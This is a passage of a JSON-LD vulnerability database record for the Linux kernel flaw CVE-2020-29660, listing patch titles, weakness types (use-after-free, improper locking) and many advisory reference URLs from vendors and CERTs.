          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.625
  },
  "last_update_date": "2024-07-23T22:10:23.557000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Fix\u00a0-\u003esession\u00a0locking",
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/bob25su6xul4tnp7kb63wnzsytiyfdpp/"
      },
      {
        "title": "Linux kernel Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=137670"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2020-29660 log"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-032",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-032"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-031",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-031"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-034",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-034"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-033",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-033"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2021-1477",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2021-1477"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.4-2022-019",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.4-2022-019"
      },
      {
        "title": "Debian Security Advisories: DSA-4843-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=b95030247235becf9e017bec31e9d503"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1588",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2021-1588"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "cve_diff_checker",
        "trust": 0.1,
        "url": "https://github.com/lcatro/cve_diff_checker "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/vincent-deng/veracode-container-security-finding-parser "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-29660"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014189"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-776"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-416",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-667",
        "trust": 1.0
      },
      {
        "problemtype": "Use of freed memory (CWE-416) [NVD evaluation ]",
        "trust": 0.8
      },
      {
        "problemtype": " improper lock (CWE-667) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014189"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-29660"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.openwall.com/lists/oss-security/2020/12/10/1"
      },
      {
        "trust": 2.3,
        "url": "http://packetstormsecurity.com/files/164950/kernel-live-patch-security-notice-lsn-0082-1.html"
      },
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
      },
      {
        "trust": 1.7,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c8bcd9c5be24fb9e6132e97da5a35e55a83e36b9"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210122-0001/"
      },
      {
        "trust": 1.7,
        "url": "https://www.debian.org/security/2021/dsa-4843"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/02/msg00018.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00010.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/mz7oakaefaxqrgbzk4lyuwincd3d2xcl/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/bob25su6xul4tnp7kb63wnzsytiyfdpp/"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu93656033/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-07"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29661"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/mz7oakaefaxqrgbzk4lyuwincd3d2xcl/"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/bob25su6xul4tnp7kb63wnzsytiyfdpp/"
      },
      {
        "trust": 0.6,
        "url": "https://device.harmonyos.com/cn/docs/security/update/security-bulletins-wearables-202111-0000001172568432"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0837"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0717"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/164875/red-hat-security-advisory-2021-4140-02.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0589"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0348/"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/2021-10-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3905"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3825"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3871"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/164812/ubuntu-security-notice-usn-5130-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0166/"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021100407"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.4254"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-use-after-free-via-tiocgsid-34081"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0189/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161556/ubuntu-security-notice-usn-4752-1.html"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27815"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29568"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28588"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29569"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24504"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-27777"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20239"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36158"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3200"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35448"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3635"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20284"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35522"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36386"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35524"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24586"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3348"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-27645"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33574"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-26140"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3487"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-26146"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31440"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-5827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3732"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24370"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-0129"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13751"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24502"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3564"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-0427"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23133"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19603"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-26144"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35521"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3679"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-35942"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17594"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36312"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3572"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12762"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36086"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-29368"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3778"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22898"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24588"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-29646"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-29155"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-16135"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36084"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3489"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3800"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36087"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36331"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-29660"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31535"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-26139"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-28971"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23841"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14615"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-26143"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3445"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3600"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22925"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-26145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-20673"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23840"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33200"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36330"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-29650"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33033"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20194"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-26147"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20232"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31916"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20266"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20838"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20231"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36332"
      },
      {
        "trust": 0.2,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14155"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10001"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24503"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36085"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14615"
      },
      {
        "trust": 0.2,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33560"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24502"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17595"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3481"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-42574"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35523"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31829"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-28153"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3573"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13750"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20197"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-26141"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3426"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-28950"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-18218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3580"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3796"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24587"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24503"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3659"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20177"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25669"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25704"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35508"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27830"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/416.html"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/667.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://security.archlinux.org/cve-2020-29660"
      },
      {
        "trust": 0.1,
        "url": "https://alas.aws.amazon.com/al2/alaslivepatch-2021-032.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43527"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3712"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:5137"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1122.136"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-203.235"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4748-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1088.97"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1146.156"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1150.160"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29374"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1038.41"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28941"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1038.40"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1010.11~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1040.42"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4750-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1037.40~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1038.41~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1037.40"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1033.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1036.38~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1029.32~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-66.74"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-66.74~18.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1040.42~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1029.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1038.40~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1010.11"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4752-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25212"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15436"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24490"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10135"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25641"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15437"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29369"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27152"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28915"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25284"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25643"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14314"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29371"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27673"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25656"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-44.50~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28974"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27777"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25668"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27675"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1019.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1023.24"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1024.26"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1016.19"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1021.22"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27835"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-44.50"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4751-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1023.25"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33194"
      },
      {
        "trust": 0.1,
